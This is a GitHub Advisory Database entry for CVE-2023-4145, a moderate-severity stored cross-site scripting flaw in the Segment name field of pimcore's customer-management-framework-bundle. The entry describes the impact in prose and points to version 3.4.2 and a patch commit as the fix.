Headline
GHSA-735f-w79p-282x: pimcore/customer-management-framework-bundle Cross-site Scripting vulnerability in Segment name
Impact
As HTML injection works in email an attacker can trick a victim to click on such hyperlinks to redirect him to any malicious site and also can host a XSS page. All this will surely cause some damage to the victim. This could lead to users being tricked into giving logins away to malicious attackers.
Patches
Update to version 3.4.2 or apply this patch manually https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2.patch
Workarounds
Apply https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2.patch manually.
References
https://huntr.dev/bounties/ce852777-2994-40b4-bb4e-c4d10023eeb0/
Skip to content
Sign up
CVE-2023-4145
Actions
Automate any workflow
Packages
Host and manage packages
Security
Find and fix vulnerabilities
Codespaces
Instant dev environments
Copilot
Write better code with AI
Code review
Manage code changes
Issues
Plan and track work
Discussions
Collaborate outside of code
Explore
* All features
* Documentation
* GitHub Skills
* Blog
For
- Enterprise
- Teams
- Startups
- Education
By Solution
- CI/CD & Automation
- DevOps
- DevSecOps
Resources
- Customer Stories
- White papers, Ebooks, Webinars
- Partners
GitHub Sponsors
Fund open source developers
* The ReadME Project
GitHub community articles
Repositories
* Topics
* Trending
* Collections
- Pricing
Search code, repositories, users, issues, pull requests…
Provide feedback
We read every piece of feedback, and take your input very seriously.
Include my email address so I can be contacted
Saved searches****Use saved searches to filter your results more quickly
Sign in
Sign up
- GitHub Advisory Database
- GitHub Reviewed
- CVE-2023-4145
pimcore/customer-management-framework-bundle Cross-site Scripting vulnerability in Segment name
Moderate severity GitHub Reviewed Published Aug 3, 2023 in pimcore/customer-data-framework
Vulnerability details Dependabot alerts 0
Package
composer pimcore/customer-management-framework-bundle (Composer)
Affected versions
< 3.4.2
Patched versions
3.4.2
Description
Impact
As HTML injection works in email an attacker can trick a victim to click on such hyperlinks to redirect him to any malicious site and also can host a XSS page. All this will surely cause some damage to the victim. This could lead to users being tricked into giving logins away to malicious attackers.
Patches
Update to version 3.4.2 or apply this patch manually https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2.patch
Workarounds
Apply https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2.patch manually.
References
https://huntr.dev/bounties/ce852777-2994-40b4-bb4e-c4d10023eeb0/
References
- GHSA-735f-w79p-282x
- pimcore/customer-data-framework@72f45dd
- https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2.patch
- https://huntr.dev/bounties/ce852777-2994-40b4-bb4e-c4d10023eeb0/
dvesh3 published to pimcore/customer-data-framework
Aug 3, 2023
Published to the GitHub Advisory Database
Aug 3, 2023
Reviewed
Aug 3, 2023
Severity
Moderate
Weaknesses
CWE-79 CWE-87
CVE ID
CVE-2023-4145
GHSA ID
GHSA-735f-w79p-282x
Source code
pimcore/customer-data-framework
Checking history
See something to contribute? Suggest improvements for this vulnerability.
Related news
Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/customer-data-framework prior to 3.4.2.